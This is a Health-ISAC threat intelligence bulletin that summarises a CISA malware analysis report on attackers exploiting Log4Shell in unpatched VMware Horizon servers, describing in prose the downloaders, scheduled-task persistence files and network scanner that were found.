H-ISAC TLP White Finished Intelligence Report Log4Shell Malware Analysis Report July 29, 2022

All members are encouraged to review Malware Analysis Report (AR22-203A): MAR-10386789-1.v1 - Log4Shell for the full report details and established YARA rules. 

The Indicators of Compromise associated with this report have been entered into Health-ISAC's automated sharing platform for members ingesting automated threat indicators. 

Upon the disclosure of the critical Log4Shell vulnerability, both opportunistic and highly skilled threat actors have exhibited an increased appetite for the exploitation of systems affected by the security flaw. Since December 2021, the cyber threat landscape has been plagued by multiple threat actors targeting and exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway (UAG) servers.  From May through June 2022, CISA provided remote incident support at an organization where CISA observed suspected Log4Shell PowerShell downloads. During remote support, CISA confirmed the organization was compromised by malicious cyber actors who exploited Log4Shell in a VMware Horizon server that did not have patches or workarounds applied. CISA analyzed five malware samples obtained from the organization’s network, including two malicious PowerShell files, two Extensible Markup Language (XML) files, and a 64-bit compiled Python Portable Executable (PE) file.

The two PowerShell files are Trojan downloaders designed to download malicious files from a command and control (C2) server and install them on the compromised system. One of the scripts also checks for and installs Nmap if it is not installed on the compromised system. The two XML files are for scheduling tasks for persistence. The 64-bit compiled Python PE file is designed to perform scans for IP addresses of live hosts, open ports, and services running on those hosts. 

View the detailed report below.